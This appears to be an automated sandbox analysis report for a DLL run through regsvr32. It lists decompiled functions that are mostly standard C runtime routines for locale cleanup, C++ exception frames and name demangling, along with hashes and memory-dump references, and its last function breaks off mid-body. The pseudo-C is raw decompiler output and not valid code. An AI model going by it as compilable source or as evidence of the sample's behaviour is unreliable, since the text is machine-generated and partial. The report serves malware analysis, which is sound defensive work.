Part of subcall function 00007FFD2B06640C: _errno.LIBCMT ref: 00007FFD2B06642C
Part of subcall function 00007FFD2B06640C: GetLastError.KERNEL32(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066434

free.LIBCMT ref: 00007FFD2B071132
__free_lconv_num.LIBCMT ref: 00007FFD2B07113E
free.LIBCMT ref: 00007FFD2B07114A
free.LIBCMT ref: 00007FFD2B071156
free.LIBCMT ref: 00007FFD2B07117A
free.LIBCMT ref: 00007FFD2B07118E
free.LIBCMT ref: 00007FFD2B07119D
free.LIBCMT ref: 00007FFD2B0711A9
free.LIBCMT ref: 00007FFD2B0711D6
free.LIBCMT ref: 00007FFD2B0711FE
free.LIBCMT ref: 00007FFD2B071218

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$ErrorLastPrivilegeRelease__free_lconv_mon__free_lconv_num_errno
String ID:
API String ID: 3604738761-0
Opcode ID: 8275107193158de9e2e3268f70a19a604abd9224b6d4d14bc70a98653dcf2d7b
Instruction ID: 6fdbd00f752df5f283bc6ac36115247d324b9aa86327af0d4bb3617187011806
Opcode Fuzzy Hash: 8275107193158de9e2e3268f70a19a604abd9224b6d4d14bc70a98653dcf2d7b
Instruction Fuzzy Hash: F441F132B1B54684EE56DF61CA613F86361EF86B44F044031DA0D4A2F9CFBDA992F690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07F75C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FFD7FFD2B07F75C(void* __ecx, void* __eflags, void* __rax, void* __rcx, void* __rbp, void* __r8, signed int _a8, void* _a16, long long _a24, long long _a32) {
				char _v72;
				void* _v88;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* _t75;
				void* _t93;
				long long _t94;
				signed int _t96;
				void* _t118;
				long long _t119;
				intOrPtr* _t120;
				void* _t124;
				signed long long _t130;

				_t123 = __r8;
				_t103 = __rcx;
				_t93 = __rax;
				_t83 = __eflags;
				_t76 = __ecx;
				r13d = 0;
				_v152 = r13d;
				_a8 = _a8 & r13d;
				_v112 = _v112 & _t130;
				_v120 = _v120 & _t130;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, _t118, __r8);
				_t94 =  *((intOrPtr*)(_t93 + 0xf8));
				_a32 = _t94;
				E00007FFD7FFD2B067F5C(_t76, __eflags, _t94, __rcx, _t118, __r8);
				_a24 =  *((intOrPtr*)(_t94 + 0xf0));
				_t119 =  *((intOrPtr*)(__rcx + 0x50));
				_a16 = _t119;
				_t96 =  *((intOrPtr*)(__rcx + 0x48));
				_v128 = _t96;
				_v88 =  *((intOrPtr*)(__rcx + 0x28));
				E00007FFD7FFD2B067F5C(_t76, __eflags, _t96, __rcx, _t119, __r8);
				 *((long long*)(_t96 + 0xf0)) = _t119;
				E00007FFD7FFD2B067F5C(_t76, __eflags, _t96, __rcx, _t119, __r8);
				 *((long long*)(_t96 + 0xf8)) =  *((intOrPtr*)(__rcx + 0x40));
				E00007FFD7FFD2B067F5C(_t76, __eflags, _t96, _t103, _t119, __r8);
				E00007FFD7FFD2B07EA0C(_t76, _t83, _t96,  &_v72,  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xf0)) + 0x28)));
				_v104 = _t96;
				_t84 =  *((intOrPtr*)(__rcx + 0x58)) - _t130;
				if ( *((intOrPtr*)(__rcx + 0x58)) == _t130) goto 0x2b07f836;
				_a8 = 1;
				E00007FFD7FFD2B067F5C(_t76,  *((intOrPtr*)(__rcx + 0x58)) - _t130, _t96,  &_v72, _t119, _t123);
				_v120 =  *((intOrPtr*)(_t96 + 0x138));
				r8d = 0x100;
				_t106 =  *((intOrPtr*)(__rcx + 0x30));
				E00007FFD7FFD2B080860( *((intOrPtr*)(__rcx + 0x30)),  *((intOrPtr*)(__rcx + 0x28)), _t124);
				_v112 = _t96;
				_v152 = 1;
				E00007FFD7FFD2B067F5C(_t76, _t84, _t96, _t106, _t119, _t123);
				 *(_t96 + 0x2c0) =  *(_t96 + 0x2c0) & 0x00000000;
				_t120 = _a16;
				if (_a8 == 0) goto 0x2b07f8a7;
				E00007FFD7FFD2B07F1C0(1, _t120);
				r8d =  *((intOrPtr*)(_v120 + 0x18));
				goto 0x2b07f8b4;
				r8d =  *((intOrPtr*)(_t120 + 0x18));
				RaiseException(??, ??, ??, ??);
				r13d = _v152;
				E00007FFD7FFD2B07EA84( *_t120, _a8, _t96, _v112, _v104, _t120, __rbp, _t123);
				if (r13d != 0) goto 0x2b07f92b;
				if ( *_t120 != 0xe06d7363) goto 0x2b07f92b;
				if ( *((intOrPtr*)(_t120 + 0x18)) != 4) goto 0x2b07f92b;
				if ( *((intOrPtr*)(_t120 + 0x20)) == 0x19930520) goto 0x2b07f914;
				if ( *((intOrPtr*)(_t120 + 0x20)) == 0x19930521) goto 0x2b07f914;
				if ( *((intOrPtr*)(_t120 + 0x20)) != 0x19930522) goto 0x2b07f92b;
				if (E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t120 + 0x20)) - 0x19930522, _t96,  *((intOrPtr*)(_t120 + 0x28))) == 0) goto 0x2b07f92b;
				E00007FFD7FFD2B07F1C0(1, _t120);
				E00007FFD7FFD2B067F5C( *_t120, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t120 + 0x20)) - 0x19930522, _t96,  *((intOrPtr*)(_t120 + 0x28))), _t96, _t120, _t120, _t123);
				 *((long long*)(_t96 + 0xf0)) = _a24;
				_t75 = E00007FFD7FFD2B067F5C( *_t120, E00007FFD7FFD2B07EA50( *((intOrPtr*)(_t120 + 0x20)) - 0x19930522, _t96,  *((intOrPtr*)(_t120 + 0x28))), _t96, _t120, _t120, _t123);
				 *((long long*)(_t96 + 0xf8)) = _a32;
				 *((long long*)( *((intOrPtr*)(_v128 + 0x1c)) +  *_v88)) = 0xfffffffe;
				return _t75;
			}

0x7ffd2b07f75c
0x7ffd2b07f75c
0x7ffd2b07f75c
0x7ffd2b07f75c
0x7ffd2b07f75c
0x7ffd2b07f772
0x7ffd2b07f775
0x7ffd2b07f77a
0x7ffd2b07f782
0x7ffd2b07f787
0x7ffd2b07f78c
0x7ffd2b07f791
0x7ffd2b07f798
0x7ffd2b07f7a0
0x7ffd2b07f7ac
0x7ffd2b07f7b4
0x7ffd2b07f7b8
0x7ffd2b07f7c0
0x7ffd2b07f7c4
0x7ffd2b07f7d5
0x7ffd2b07f7da
0x7ffd2b07f7df
0x7ffd2b07f7e6
0x7ffd2b07f7eb
0x7ffd2b07f7f2
0x7ffd2b07f807
0x7ffd2b07f80f
0x7ffd2b07f814
0x7ffd2b07f818
0x7ffd2b07f81a
0x7ffd2b07f825
0x7ffd2b07f831
0x7ffd2b07f836
0x7ffd2b07f83f
0x7ffd2b07f842
0x7ffd2b07f84a
0x7ffd2b07f861
0x7ffd2b07f869
0x7ffd2b07f86e
0x7ffd2b07f875
0x7ffd2b07f885
0x7ffd2b07f88c
0x7ffd2b07f89a
0x7ffd2b07f8a5
0x7ffd2b07f8ab
0x7ffd2b07f8b4
0x7ffd2b07f8ba
0x7ffd2b07f8e1
0x7ffd2b07f8e9
0x7ffd2b07f8f1
0x7ffd2b07f8f7
0x7ffd2b07f900
0x7ffd2b07f909
0x7ffd2b07f912
0x7ffd2b07f91f
0x7ffd2b07f926
0x7ffd2b07f92b
0x7ffd2b07f930
0x7ffd2b07f937
0x7ffd2b07f93c
0x7ffd2b07f950
0x7ffd2b07f96d

APIs

_getptd.LIBCMT ref: 00007FFD2B07F78C

Part of subcall function 00007FFD2B067F5C: _amsg_exit.LIBCMT ref: 00007FFD2B067F72

_getptd.LIBCMT ref: 00007FFD2B07F7A0
_getptd.LIBCMT ref: 00007FFD2B07F7DA
_getptd.LIBCMT ref: 00007FFD2B07F7E6
_getptd.LIBCMT ref: 00007FFD2B07F7F2
_CreateFrameInfo.LIBCMT ref: 00007FFD2B07F807

Part of subcall function 00007FFD2B07EA0C: _getptd.LIBCMT ref: 00007FFD2B07EA18
Part of subcall function 00007FFD2B07EA0C: _getptd.LIBCMT ref: 00007FFD2B07EA26
Part of subcall function 00007FFD2B07EA0C: _getptd.LIBCMT ref: 00007FFD2B07EA3A

_getptd.LIBCMT ref: 00007FFD2B07F825
_getptd.LIBCMT ref: 00007FFD2B07F92B
_getptd.LIBCMT ref: 00007FFD2B07F937

Strings

csm, xrefs: 00007FFD2B07F8EB

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$CreateFrameInfo_amsg_exit
String ID: csm
API String ID: 2825728721-1018135373
Opcode ID: 5860030a6f08b9a697e16d77bab3db7902ba8ecb0713b73439a9e44d9fdcb455
Instruction ID: 3611a78e1667417e8470c4873a30164cc2e4661a0db1443c75f41597f0d9710e
Opcode Fuzzy Hash: 5860030a6f08b9a697e16d77bab3db7902ba8ecb0713b73439a9e44d9fdcb455
Instruction Fuzzy Hash: 0C41B632609B8296E6719F16E95077AB3A4FB45790F004235EF9D07BA1DF78E051E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B061058 Relevance: 16.6, APIs: 11, Instructions: 113COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 00007FFD2B061091
SelectObject.GDI32 ref: 00007FFD2B0610A0
$pdata$_XMMI_FP_Emulation.LIBCMT ref: 00007FFD2B061117
$pdata$_XMMI_FP_Emulation.LIBCMT ref: 00007FFD2B061128
Polyline.GDI32 ref: 00007FFD2B0611A1
MoveToEx.GDI32 ref: 00007FFD2B0611B4
LineTo.GDI32 ref: 00007FFD2B0611C4
MoveToEx.GDI32 ref: 00007FFD2B0611D7
LineTo.GDI32 ref: 00007FFD2B0611E7
SelectObject.GDI32 ref: 00007FFD2B0611F3
DeleteObject.GDI32 ref: 00007FFD2B0611FC

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Object$$pdata$_EmulationLineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1734023669-0
Opcode ID: e50320145266f0c62f5261b744deee320b6b784ecb2261ca4089e73084606f16
Instruction ID: f7f3cb85b021ac0fdc6497d0b417121cb69d6a34f289a977f20089fb0bf4f391
Opcode Fuzzy Hash: e50320145266f0c62f5261b744deee320b6b784ecb2261ca4089e73084606f16
Instruction Fuzzy Hash: 9E515C75F25B118EE713CF31ED2066977B4BB4AB84B008236DE0A63B24DF78A4429B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07006C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 130
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00007FFD7FFD2B07006C(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* __rax, long long __rbx, signed long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long _a8, long long _a16) {
				char _v24;
				signed int _v32;
				signed long long _v40;
				signed int _v48;
				signed long long _v56;
				signed int _v72;
				signed long long _t32;
				char _t56;
				signed long long _t60;
				void* _t63;
				signed long long* _t66;
				char* _t69;
				signed long long* _t73;
				signed long long* _t75;
				signed long long* _t76;
				signed long long* _t78;
				signed long long* _t82;
				long long* _t84;
				signed long long* _t86;
				void* _t102;

				_t116 = __r11;
				_t115 = __r10;
				_t104 = __rsi;
				_t63 = __rax;
				_t55 = __esi;
				_t42 = __ecx;
				_a8 = __rbx;
				_a16 = __rdi;
				_v56 = _v56 & 0x00000000;
				_t66 = __rcx;
				_t69 =  *0x2b0c9a70; // 0x0
				r8d =  *_t69;
				r9d = 0xffff0000;
				_t102 = __rdx;
				_v48 = _v48 & r9d;
				_t56 = r8d;
				if (_t56 == 0) goto 0x2b070248;
				r8d = r8d - 0x24;
				if (_t56 == 0) goto 0x2b070120;
				r8d = r8d - 0x1d;
				if (_t56 == 0) goto 0x2b0700ed;
				r8d = r8d - 1;
				if (_t56 == 0) goto 0x2b0700c5;
				E00007FFD7FFD2B06FC30(__ebx, __ecx, __esi, __rax, __rcx, __rcx, __rdx, __r8, __r10, __r11);
				goto 0x2b070268;
				E00007FFD7FFD2B06AD7C( &_v56, "volatile");
				if ( *_t102 == 0) goto 0x2b0700e6;
				E00007FFD7FFD2B06AF5C(0x20, __esi, _t63, _t66,  &_v56, __rsi, __r8);
				_t73 =  *0x2b0c9a70; // 0x0
				asm("movups xmm0, [edi]");
				 *0x2b0c9a70 = _t73 + 1;
				_t75 = _t66;
				asm("movdqu [ebp-0x20], xmm0");
				asm("bts dword [ebp-0x18], 0x8");
				E00007FFD7FFD2B06F88C(_t42, 0x20, __esi, _t66, _t75,  &_v56, _t102, __rsi,  &_v40, 0x2b08393c, __r10, __r11);
				goto 0x2b070268;
				_t32 = _t75[0];
				if (_t32 == 0x24) goto 0x2b070143;
				if (_t32 == 0) goto 0x2b070248;
				_t66[1] = _t66[1] & 0xffff00ff;
				 *_t66 =  *_t66 & 0x00000000;
				_t66[1] = 2;
				goto 0x2b070268;
				_t76 =  &(_t75[0]);
				 *0x2b0c9a70 = _t76;
				_t60 =  *_t76;
				if (_t60 == 0) goto 0x2b070248;
				if (_t60 == 0) goto 0x2b070231;
				if (_t60 == 0) goto 0x2b070214;
				if (_t60 == 0) goto 0x2b0701dd;
				if (_t60 == 0) goto 0x2b0701d1;
				if (_t60 == 0) goto 0x2b0701a9;
				if (_t60 == 0) goto 0x2b07019d;
				if (_t60 != 0) goto 0x2b07012f;
				 *0x2b0c9a70 =  &(_t76[0]);
				_t78 = _t66;
				E00007FFD7FFD2B06A9E0(_t78, "std::nullptr_t");
				goto 0x2b070268;
				 *0x2b0c9a70 =  &(_t78[0]);
				goto 0x2b07012f;
				E00007FFD7FFD2B06AD7C( &_v56, "volatile");
				if ( *_t102 == 0) goto 0x2b0701ca;
				E00007FFD7FFD2B06AF5C(0x20, _t55, _t63, _t66,  &_v56, _t104,  &_v40);
				_t82 =  *0x2b0c9a70; // 0x0
				goto 0x2b0700f4;
				_v32 = _v32 & r9d;
				_v40 = _v40 & 0x00000000;
				_v72 = _v72 & 0x00000000;
				 *0x2b0c9a70 = _t82 + 1;
				_t84 =  &_v24;
				E00007FFD7FFD2B06EFA4(_t66, _t84, _t102, _t104, 0x2b08398d,  &_v40, __r10, __r11);
				goto 0x2b0700b8;
				r8d = 1;
				 *0x2b0c9a70 = _t84 + 1;
				_t86 = _t66;
				E00007FFD7FFD2B06C43C(0x20, _t55, _t66, _t86, _t102, _t102, _t104, 0x2b08398d, _t115, _t116, __r12);
				goto 0x2b070268;
				 *0x2b0c9a70 =  &(_t86[0]);
				E00007FFD7FFD2B06EAB8(_t42, _t66, _t66, _t102, _t102, _t104, 0x2b08398d, _t115, _t116);
				goto 0x2b070268;
				E00007FFD7FFD2B06A490(1, _t63,  &_v40);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebx], xmm0");
				return E00007FFD7FFD2B06AC78(_t63, _t66, _t102);
			}

0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b07006c
0x7ffd2b070071
0x7ffd2b07007e
0x7ffd2b070083
0x7ffd2b070086
0x7ffd2b07008d
0x7ffd2b070091
0x7ffd2b070097
0x7ffd2b07009a
0x7ffd2b07009e
0x7ffd2b0700a1
0x7ffd2b0700a7
0x7ffd2b0700ab
0x7ffd2b0700ad
0x7ffd2b0700b1
0x7ffd2b0700b3
0x7ffd2b0700b6
0x7ffd2b0700bb
0x7ffd2b0700c0
0x7ffd2b0700d0
0x7ffd2b0700d9
0x7ffd2b0700e1
0x7ffd2b0700e6
0x7ffd2b0700f4
0x7ffd2b0700fe
0x7ffd2b070109
0x7ffd2b07010c
0x7ffd2b070111
0x7ffd2b070116
0x7ffd2b07011b
0x7ffd2b070120
0x7ffd2b070125
0x7ffd2b070129
0x7ffd2b07012f
0x7ffd2b070136
0x7ffd2b07013a
0x7ffd2b07013e
0x7ffd2b070143
0x7ffd2b070147
0x7ffd2b070151
0x7ffd2b070153
0x7ffd2b07015c
0x7ffd2b070164
0x7ffd2b07016c
0x7ffd2b070171
0x7ffd2b070175
0x7ffd2b070179
0x7ffd2b07017d
0x7ffd2b070189
0x7ffd2b070190
0x7ffd2b070193
0x7ffd2b070198
0x7ffd2b0701a0
0x7ffd2b0701a7
0x7ffd2b0701b4
0x7ffd2b0701bd
0x7ffd2b0701c5
0x7ffd2b0701ca
0x7ffd2b0701d8
0x7ffd2b0701dd
0x7ffd2b0701e1
0x7ffd2b0701e6
0x7ffd2b0701f9
0x7ffd2b070200
0x7ffd2b070207
0x7ffd2b07020f
0x7ffd2b070217
0x7ffd2b070220
0x7ffd2b070227
0x7ffd2b07022a
0x7ffd2b07022f
0x7ffd2b070237
0x7ffd2b070241
0x7ffd2b070246
0x7ffd2b070251
0x7ffd2b07025c
0x7ffd2b07025f
0x7ffd2b07027a

APIs

DName::operator=.LIBCMT ref: 00007FFD2B0700D0
DName::operator+=.LIBCMT ref: 00007FFD2B0700E1
DName::DName.LIBCMT ref: 00007FFD2B070193

Part of subcall function 00007FFD2B06FC30: DName::operator=.LIBCMT ref: 00007FFD2B06FCB7
Part of subcall function 00007FFD2B06FC30: DName::DName.LIBCMT ref: 00007FFD2B06FF73
Part of subcall function 00007FFD2B06FC30: DName::operator+=.LIBCMT ref: 00007FFD2B06FF88
Part of subcall function 00007FFD2B06FC30: DName::DName.LIBCMT ref: 00007FFD2B06FFA6
Part of subcall function 00007FFD2B06FC30: DName::operator+=.LIBCMT ref: 00007FFD2B06FFBA
Part of subcall function 00007FFD2B06FC30: DName::operator+=.LIBCMT ref: 00007FFD2B06FFC7

DName::operator+=.LIBCMT ref: 00007FFD2B070263

Strings

std::nullptr_t, xrefs: 00007FFD2B070182
volatile, xrefs: 00007FFD2B0700C5, 00007FFD2B0701A9

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$NameName::$Name::operator=
String ID: std::nullptr_t$volatile
API String ID: 3368348380-3726895890
Opcode ID: e3e0294c1502f321fe908f92438bca3b529613c9a668d4bdf7da87f404110895
Instruction ID: 34fed5f0361d7928a7c15d8b070a84531fd5e380e408e6324fdce059471185ab
Opcode Fuzzy Hash: e3e0294c1502f321fe908f92438bca3b529613c9a668d4bdf7da87f404110895
Instruction Fuzzy Hash: 8351A022F1EA1684FB138B659E217B86360FF56784F544331DA4E06AB5EFACE145F2C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06D634 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00007FFD7FFD2B06D634(void* __ecx, void* __edx, void* __esi, void* __rax, long long* __rcx, void* __rdi, void* __rsi, void* __r8, void* __r10, long long __r11) {
				char _v24;
				char _v32;
				char _v40;
				void* __rbx;
				signed int _t15;
				char _t18;
				void* _t25;
				void* _t26;
				void* _t38;
				long long* _t40;
				char* _t43;
				intOrPtr _t51;

				_t58 = __rsi;
				_t38 = __rax;
				_t26 = __ecx;
				_t15 =  *0x2b0c9a8c; // 0x0
				_t51 =  *0x2b083a30; // 0x7ffd2b083a18
				_t40 = __rcx;
				if (( !_t15 & 0x00000001) != 0) goto 0x2b06d654;
				_t3 =  &_v40; // -63
				E00007FFD7FFD2B06A9E0(_t3, _t51 + 2);
				_t43 =  *0x2b0c9a70; // 0x0
				r11d = 0;
				if ( *_t43 == r11b) goto 0x2b06d6c5;
				_t18 =  *_t43;
				 *0x2b0c9a70 = _t43 + 1;
				if (_t18 == 0x30) goto 0x2b06d6b2;
				if (_t18 == 0x32) goto 0x2b06d699;
				if (_t18 != 0x35) goto 0x2b06d6fb;
				 *(_t40 + 8) =  *(_t40 + 8) & 0xffff00ff;
				 *_t40 = __r11;
				 *(_t40 + 8) = 2;
				goto 0x2b06d715;
				_t7 =  &_v24; // -47
				E00007FFD7FFD2B06D358(_t26, __esi, _t18 - 0x35, _t38, _t40, _t7, _t51 + 2, __rdi, __rsi, __r8, __r10, __r11);
				_t8 =  &_v40; // -63
				E00007FFD7FFD2B06AC78(_t38, _t8, _t38);
				goto 0x2b06d6fb;
				_t9 =  &_v40; // -63
				E00007FFD7FFD2B06AFE0(_t26, __esi, _t38, _t40, _t9, "void", __rsi, __r8);
				goto 0x2b06d6fb;
				if (_v32 - 1 > 0) goto 0x2b06d6fb;
				if (_v40 == __r11) goto 0x2b06d6ec;
				E00007FFD7FFD2B06A12C(1, "void");
				_t12 =  &_v40; // -63
				E00007FFD7FFD2B06A564(_t38, _t40, _t12, _t38, __r8);
				goto 0x2b06d6fb;
				_t13 =  &_v40; // -63
				E00007FFD7FFD2B06A640(1, _t38, _t13);
				_t14 =  &_v40; // -63
				_t25 = E00007FFD7FFD2B06AFE0(1, __esi, _t38, _t40, _t14, ") ", _t58, __r8);
				asm("movups xmm5, [esp+0x20]");
				asm("movdqu [ebx], xmm5");
				return _t25;
			}

0x7ffd2b06d634
0x7ffd2b06d634
0x7ffd2b06d634
0x7ffd2b06d63a
0x7ffd2b06d640
0x7ffd2b06d647
0x7ffd2b06d64e
0x7ffd2b06d654
0x7ffd2b06d659
0x7ffd2b06d65e
0x7ffd2b06d665
0x7ffd2b06d66b
0x7ffd2b06d66d
0x7ffd2b06d673
0x7ffd2b06d67d
0x7ffd2b06d682
0x7ffd2b06d687
0x7ffd2b06d689
0x7ffd2b06d690
0x7ffd2b06d693
0x7ffd2b06d697
0x7ffd2b06d699
0x7ffd2b06d69e
0x7ffd2b06d6a3
0x7ffd2b06d6ab
0x7ffd2b06d6b0
0x7ffd2b06d6b9
0x7ffd2b06d6be
0x7ffd2b06d6c3
0x7ffd2b06d6ca
0x7ffd2b06d6d1
0x7ffd2b06d6d8
0x7ffd2b06d6dd
0x7ffd2b06d6e5
0x7ffd2b06d6ea
0x7ffd2b06d6ec
0x7ffd2b06d6f6
0x7ffd2b06d702
0x7ffd2b06d707
0x7ffd2b06d70c
0x7ffd2b06d711
0x7ffd2b06d71d

APIs

DName::DName.LIBCMT ref: 00007FFD2B06D659
UnDecorator::getScopedName.LIBCMT ref: 00007FFD2B06D69E

Part of subcall function 00007FFD2B06D358: UnDecorator::getZName.LIBCMT ref: 00007FFD2B06D380
Part of subcall function 00007FFD2B06D358: DName::operator+=.LIBCMT ref: 00007FFD2B06D3BF
Part of subcall function 00007FFD2B06D358: DName::operator+=.LIBCMT ref: 00007FFD2B06D3D4

DName::operator+=.LIBCMT ref: 00007FFD2B06D6AB
DName::operator+=.LIBCMT ref: 00007FFD2B06D707

Part of subcall function 00007FFD2B06AFE0: DName::operator=.LIBCMT ref: 00007FFD2B06B00B

Strings

void, xrefs: 00007FFD2B06D6B2

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::get$Name::Name::operator=Scoped
String ID: void
API String ID: 3435855044-3531332078
Opcode ID: 9bdf0d8be4b29ed2f5a80e3554fd8d2770c7793c3c2b7f353ed8f11209626f34
Instruction ID: 395563d7a6fede70f6ce97584c8b23059982b6c1d7e67dd185d61190a5bac4e6
Opcode Fuzzy Hash: 9bdf0d8be4b29ed2f5a80e3554fd8d2770c7793c3c2b7f353ed8f11209626f34
Instruction Fuzzy Hash: 6621B951F1EA8249E7229B15EE721792350BF67344F444231E58D452F6DEACE581E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07F244 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD2B07F244(void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, long long _a8) {
				void* _t33;
				void* _t44;
				intOrPtr* _t46;
				long long _t47;
				intOrPtr _t54;

				_t61 = __r8;
				_t56 = __rsi;
				_t44 = __rax;
				_a8 = __rbx;
				if (__rcx == 0) goto 0x2b07f2d4;
				_t46 =  *((intOrPtr*)(__rcx));
				if (_t46 == 0) goto 0x2b07f2d4;
				if ( *_t46 != 0xe06d7363) goto 0x2b07f29a;
				if ( *((intOrPtr*)(_t46 + 0x18)) != 4) goto 0x2b07f29a;
				if ( *((intOrPtr*)(_t46 + 0x20)) == 0x19930520) goto 0x2b07f287;
				if ( *((intOrPtr*)(_t46 + 0x20)) == 0x19930521) goto 0x2b07f287;
				if ( *((intOrPtr*)(_t46 + 0x20)) != 0x19930522) goto 0x2b07f29a;
				_t41 =  *((long long*)(_t46 + 0x30));
				if ( *((long long*)(_t46 + 0x30)) != 0) goto 0x2b07f29a;
				E00007FFD7FFD2B067F5C(_t33,  *((long long*)(_t46 + 0x30)), __rax, __rcx, __rsi, __r8);
